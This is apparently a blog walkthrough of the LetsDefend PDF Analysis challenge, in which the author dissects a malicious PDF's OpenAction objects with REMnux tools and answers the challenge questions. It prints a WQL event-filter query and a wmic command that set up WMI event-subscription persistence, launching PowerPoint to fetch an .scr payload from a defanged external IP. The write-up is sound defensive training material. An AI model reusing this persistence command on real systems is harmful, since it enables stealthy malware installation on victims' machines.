LetsDefend— PDF Analysis Challenge Walkthrough

Analyzing a Malicious PDF Document with REMnux & Peepdf

Drew Arpino
10 min readMar 4, 2024
Image Credit: LetsDefend.io

Introduction:

Hello — Thanks for joining me on this walkthrough! This week I am going to tackle the medium difficulty PDF Analysis Challenge on LetsDefend! This challenge should be a great opportunity to expand my PDF analysis skills and learn some new tools for my workflow. This time around, I am also checking out and using REMnux to work through this challenge. If you are unfamiliar, REMnux is a Linux distro built for malware analysis so we should have some cool tools to check out. As always, this write up will serve as both a learning journal for me and a LetsDefend challenge walkthrough for anyone who stumbles upon this post. Thanks for reading — hope it helps!

Challenge Link: https://app.letsdefend.io/challenge/pdf-analysis

Challenge Scenarios:

An employee has received a suspicious email:

From: SystemsUpdate@letsdefend.io To: Paul@letsdefend.io Subject: Critical — Annual Systems UPDATE NOW Body: Please do the dutiful before the deadline today. Attachment: Update.pdf Password: letsdefend
The employee has reported this incident to you as the analyst which has also forwarded the attachment to your SIEM. They have mentioned that they did not download or open the attachment as they found it very suspicious. They wish for you to analyze it further to verify its legitimacy.

NOTE: Do not open in your local environment. It is a malicious file.

This challenge prepared by @DXploiter

Setup the REMnux Analysis Environment & Extract the challenge file:

First, I want to set the stage since this is my first time using REMnux. I’ll be referencing the excellent REMnux Documentation regularly in this post:

https://docs.remnux.org/

Second, to keep this write-up focused I’m going to skip a step-by-step setup guide of REMnux. Instead, if you want to setup your own REMnux environment please follow the directions provided by REMnux directly.

For reference, I opted for the virtual appliance method:

https://docs.remnux.org/install-distro/get-virtual-appliance

Okay! Now that we have our environment created, updated, isolated, and snapshotted, we can extract our challenge file archive and get started!

Questions 1, 2, & 3 :

What local directory name would have been targeted by the malware?

What would have been the name of the file created by the payload?

What file type would this have been if it were created?

There are a couple of ways to approach this challenge that I am familiar with already, but since I am using a new environment for analysis, we’ll start by checking out the REMnux documentation and see what PDF specific analysis tools are available. https://docs.remnux.org/discover-the-tools/analyze+documents/pdf

Wow! There are quite a few tools we can use but before we dive in, let’s pull back a little. I want to point out an awesome reference poster that can help provide some context, the SANS Analyzing Malicious Documents cheat sheet. This is an incredibly helpful cheat sheet provides us with some quick, actionable tips for analyzing malicious documents.

We’ll start first with the tools that I am familiar with already and covered by the SANS cheat sheet — pdfid & pdf-parser. We can use these tools for basic analysis to get a high-level view of the malicious PDF document.

After running pdfid & pdf-parser, we get some basic information about the malicious PDF. Something interesting to note are the three /OpenActions. Open actions are triggered when a PDF file is opened and could be abused by a bad actor to execute JavaScript, open a file/web page, etc. Let’s make a note of this finding as we go deeper into the investigation.

pdfid output.
pdf parser output.

While helpful, these tools aren’t giving us the deep analysis context we are looking for. Let’s try peepdf, which the REMnux documentation states can be used to “examine elements of the PDF file.”

After reviewing the tool’s documentation and checking out the usage options, Let’s try it out and point it to the malicious PDF. We will use the -f option to force parsing of the file and ignore any errors that are encountered.

peepdf -f /home/remnux/Challenges/pdfAnalysis/Update.pdf
Peepdf output.

This gives us a nice overview with a bit more detail than we saw with pdfid, but we want to go even further. So, next, we’ll enter peepdf’s interactive mode with the -i option. Once we enter the interactive mode we’ll pull up the help menu and see what commands we have available to move forward.

peepdf -i -f /home/remnux/Challenges/pdfAnalysis/Update.pdf

Let’s first focus on the “suspicious elements” flagged by the tool. Remember the three Open Actions we noted after running pdfid? Let’s try to analyze these objects more closely. After running peepdf we see under /OpenAction that there are three objects: 19, 26, & 17.

Let’s go down the line and use the object command to show the decoded content — we’ll start with object 19.

This is very interesting! This object contains a Base 64 encoded PowerShell command. Let’s jump into CyberChef which is also built-in to REMnux. Maybe we can build a recipe that we can use to decode this script? Since we know the command is Base 64 encoded, let’s start there and apply a reverse operation and to get something readable:

Awesome! We successfully extracted and decoded the malicious PowerShell command with CyberChef. With that, we can answer Questions 1, 2, & 3!

Questions 4, 5, 6:

Which external web domain would the malware have attempted to interact with?

Which HTTP method would it have used to interact with this service?

What is the name of the obfuscation used for the Javascript payload?

Let’s continue looking at the other /OpenAction objects and try to understand what they are doing. This time, we’ll focus on 17 — don’t worry we will circle back to 26 later.

This looks like it is pointing to something else at 33, maybe a stream within the object? Fortunately, peepdf also has a stream command we can use to show the decoded stream content.

After running it, we get the above output. This looks like obfuscated JavaScript, right? We also see some readable strings referring to HTTP requests, specifically POST, and references to JSON. We are probably looking in the right place, since these are methods for transporting data from a client to a server.

Let’s focus on the eval() function. Here is some information from Mozilla:

The eval() function evaluates JavaScript code represented as a string and returns its completion value. The source is parsed as a script.

Warning: Executing JavaScript from a string is an enormous security risk. It is far too easy for a bad actor to run arbitrary code when you use eval().

That sounds risky — it seems like this is an obfuscated payload where the eval() function reads and then executes the string.

Let’s pivot and refer back to the REMnux documentation to see if we can find a useful method to analyze scripts. Fortunately, there are a few tools listed, including JS Beautifier which can be used to “Reformat JavaScript scripts for easier analysis.”

While we can use the online version — let’s stay in REMnux and use the built-in utilities for fun. We’ll export the stream into a text file, feed it to JS-Beautify, and see if the tool deobfuscates the code in the output for further analysis…

There we go! This looks like the information we need to answer Questions 4, 5, & 6!

Questions 7, 8, 9, 10, & 11:

Which tool would have been used for creating the persistence mechanism?

How often would the persistence be executed once Windows starts? (format: X.X hours)?

Which LOLBin would have been used in the persistence method?

What is the filename that would have been downloaded and executed using the LOLbin?

Where would this have been downloaded from? (format: IP address)

So let’s recap quickly. We have been doing deep dives into the /OpenAction we uncovered with peepdf and have already analyzed objects 17 & 19.

Now, let’s return to our interactive peepdf console and check out the last of the /OpenActions, object 26.

Surprise, surprise — more obfuscated code. It seems like this will attempt to execute some arbitrary code with PowerShell. Maybe we can do some dynamic analysis and actually run the code in PowerShell to understand what it does?

First, we will export the code into a PowerShell (.ps1) script file. After reviewing the REMnux docs again, it looks like we have PowerShell core built in. This is perfect, we should be able to execute our script and have it print the output rather than execute the malicious code.

Even though we are performing our analysis in a sandboxed environment without network access, we will change the Invoke-Expression $LoadCodeto Write-Output $LoadCodeso we aren’t executing the malicious code but writing the output to the console instead.

Setting the .ps1 script to write output to the console.
Badscript.ps1 PowerShell with Write-Output.

Excellent — this output should provide us with enough information to answer the remaining questions for this challenge.

For Question 7, it looks like the script is abusing WMIC to create a persistence mechanism. For context, WMIC is an older command line tool used for interacting with Windows Management Instrumentation (WMI) which can be used to control and query Windows.

According to MITRE ATT&CK this sub-technique (T1546.003) can be abused for persistence:

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.

Let’s focus on some specifics in the output for the context of our investigation:

Query=”SELECT * FROM __InstanceModificationEvent WITHIN 9000 WHERE TargetInstance ISA ‘Win32_PerfFormattedData_PerfOS_System’”

wmic /NAMESPACE:”\\root\subscription” PATH CommandLineEventConsumer CREATE Name=”RHWsZbGvlj”, ExecutablePath=”C:\Program Files\Microsoft Office\root\Office16\Powerpnt.exe ‘hxxp://60.187.184.54/wallpaper482.scr’

Okay, I’m going to stumble through an oversimplification here — It seems that the WMIC command is used to create an event subscription where every 9000 seconds (or 2.5 hours) the command line event consumer “RHWsZbGv1j” is triggered. This consumer launches the legitimate process, Powerpnt.exe. with the command line argument “hxxp://60[.]187[.]184[.]54/wallpaper482[.]scr” to open the wallpaper482.scr file.

Whew! Okay, now acouple of things to note here for our questions:

Since PowerPoint (Powerpnt.exe) is a legitimate binary included with Microsoft Office, this is an example of the malicious file abusing a legitimate command for bad activity. This technique is an example of using a “living off the land binary” or LOLbin.

hxxp://60[.]187[.]184[.]54/wallpaper482[.]scr is a defanged URL so that it can’t be accidentally clicked — safety first!

Regarding the wallpaper482 file — A .scr file, while normally used for Windows screen saver, is an executable file type and can contain malware. In this case, I think we can be pretty confident that it does!

Question 12: Which country is this IP Address located in?

Finally, we are at the last question! Now that we have the IP address where the persistence payload is retrieved, we can see what kind of geolocation intelligence we can gather about this IP address. We’ll check a couple of geolocation databases as the location data can vary depending on the method the database provider used to determine the geolocation.

We’ll start as usual with VirusTotal where we can see tentatively that the IP address is located in China.

To double-verify, we will also check the IP address using ipinfo.io.

Geolocation data from https://ipinfo.io/

Okay, double-confirmed! I think we can submit our answer and wrap up this investigation!

Conclusion:

We made it! Thank you to LetsDefend for hosting another awesome challenge. This was a really fun one with so much practical application that can be taken back into the field including the opportunity to try out REMnux and perform analysis on a malicious PDF file with some awesome tools like pdfid, pdf-parser, and peepdf.

Thank you so much for reading along and learning with me! I hope that you had as much fun as I did and learned something new, too. Stay curious!

Tools & References:

LetsDefend PDF Analysis Challenge: https://app.letsdefend.io/challenge/pdf-analysis

REMNux: https://remnux.org/

REMnux Documentation: https://docs.remnux.org/

Adobe Open Actions Reference: https://helpx.adobe.com/acrobat/using/applying-actions-scripts-pdfs.html

SANS Analyzing Malicious Documents Cheat Sheet: https://www.sans.org/posters/cheat-sheet-for-analyzing-malicious-documents/

pdf-parser.py: https://blog.didierstevens.com/programs/pdf-tools/

pdfid.py: https://blog.didierstevens.com/programs/pdf-tools/

peepdf: https://eternal-todo.com/tools/peepdf-pdf-analysis-tool

CyberChef: https://gchq.github.io/CyberChef/

JavaScript eval function: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

Mozilla Developer Network: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

JS Beautifier: https://beautifier.io/

MITRE ATT&CK Event Triggered Execution: Windows Management Instrumentation Event Subscription: https://attack.mitre.org/techniques/T1546/003/

VirusTotal: https://www.virustotal.com/

Ipinfo.io: https://ipinfo.io/

--

--

No responses yet